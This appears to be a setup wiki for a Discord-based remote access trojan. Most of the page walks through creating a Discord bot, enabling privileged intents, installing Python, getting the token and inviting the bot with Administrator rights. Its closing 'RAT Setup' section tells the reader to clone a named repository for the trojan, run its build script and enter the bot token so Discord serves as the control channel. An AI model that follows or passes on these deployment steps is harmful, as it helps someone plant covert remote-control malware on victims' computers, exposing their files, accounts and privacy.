Discord Bot Setup Wiki

Your step-by-step guide to building and running your Discord bot.

Discord Bot Setup

To begin, you must first have a Discord bot. Make sure to enable ALL THREE intents to allow your bot to function properly.

Step 1: Create Your Discord Bot

Follow these steps to create a Discord bot:

  1. Go to the Discord Developer Portal.
  2. Click on the "New Application" button and give your application a name.
  3. Navigate to the "Bot" tab on the left-hand sidebar and click "Add Bot".
  4. Your bot is now created. You will need its Token to proceed (we will get it in the next section).
  5. Make sure to enable all three privileged intents (Presence Intent, Server Members Intent, and Message Content Intent) for your bot to work properly.
  6. See below for a visual guide:
  7. Bot Intents Settings

Install Python 3.12.3

Make sure you have Python 3.12.3 installed. If not, follow the steps below.

Step 2: Install Python 3.12.3

Follow these instructions to install Python 3.12.3:

  1. Go to the Python 3.12.3 download page.
  2. Download the version suitable for your operating system.
  3. Run the installer and make sure to check the box that says "Add Python to PATH".

Get Your Bot Token & Add Permissions

Now you need to get your bot token and add the bot to your server.

Step 3: Get Your Bot Token

Follow these steps to get your bot token:

  1. Go back to the Discord Developer Portal.
  2. Under your application, go to the "Bot" tab and click "Copy" next to the Token field.
  3. Keep this token safe, as you will use it to run your bot.
Step 4: Add Your Bot to Your Server

To invite the bot to your server, follow these steps:

  1. In the "OAuth2" tab of the Discord Developer Portal, scroll down to "OAuth2 URL Generator".
  2. Under "SCOPES", check the box for "bot".
  3. Under "BOT PERMISSIONS", select the necessary permissions for your bot (e.g., Administrator if you want it to have full access).
  4. Copy the generated URL, paste it into your browser, and invite the bot to your server.
  5. If you don’t have a server, you can create one by clicking the "+" button in Discord’s sidebar and following the prompts.

RAT Setup

Follow the steps below to set up the RAT (Remote Access Trojan) using the bot:

Step 1: Run the Build.bat File

After you clone the repository, you should run the build.bat file to compile the project.

Step 2: Enter the Bot Token

When prompted, enter your Discord bot token. This allows the bot to communicate with your server.

Step 3: Set Up and Run

Complete the setup and run the bot with the following commands:

git clone https://github.com/manglar23/DJTrump-RatTool
cd DJTrump-RatTool